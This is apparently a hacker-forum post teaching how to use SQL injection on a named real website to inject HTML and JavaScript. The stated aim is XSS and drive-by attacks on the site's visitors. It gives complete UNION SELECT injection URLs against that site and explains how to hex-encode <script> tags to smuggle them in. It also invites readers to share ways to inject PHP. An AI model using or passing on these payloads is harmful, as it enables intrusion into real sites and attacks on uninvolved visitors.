Let's add html with SQLi

1. Why to add html?
2. Ok the reason why we do this is to execute xss and drive-by and we can effect the visitors using this..
3. It increases our attack vactors and its an example of how sqli can carry out attacks to effect the users/visitors..
4.  
5. Here is a way I found to add html with sql injection:
6.  
7. Click on it:
8. http://old.cageprisoners.com/articles.php?id=-25632 UNION ALL SELECT 1,2,concat(0x3c7363726970743e616c6572742827,version(),0x27293b3c2f7363726970743e) ,4,5,6-- -
9.  
10. It'll popup with the db version :)
11.  
12. Next you can add more tags like <h1></h1> shit and stuff with
13. http://old.cageprisoners.com/articles.php?id=-25632 UNION%20ALL SELECT 1,2,concat(0x3c68313e4920676f7420746865206461746162617365206261627920697420697320,version%28%29,0x3c2f68313e) ,4,5,6--%20-
14.  
15. convert the tag <script>alert(' into hexa which is:
16. 3c7363726970743e616c6572742827
17.  
18. so 0x3c7363726970743e616c6572742827
19.  
20. next convert the tag ');</script> into hexa which is:
21. 27293b3c2f7363726970743e
22.  
23. so 0x27293b3c2f7363726970743e
24.  
25. we need <script>alert('version()');</script>
26. so,
27. concat(0x3c7363726970743e616c6572742827,version(),0x27293b3c2f7363726970743e) is what we will do and check the results..
28.  
29. Further experiemnt:
30. I tried injecting php codes too but i couldn't and failed..
31. Injecting php codes could take this attack to a much higher level.
32. Please share any of your new methods regarding this if you find..
33.  
34. Hexa converter:
35. http://www.string-functions.com/string-hex.aspx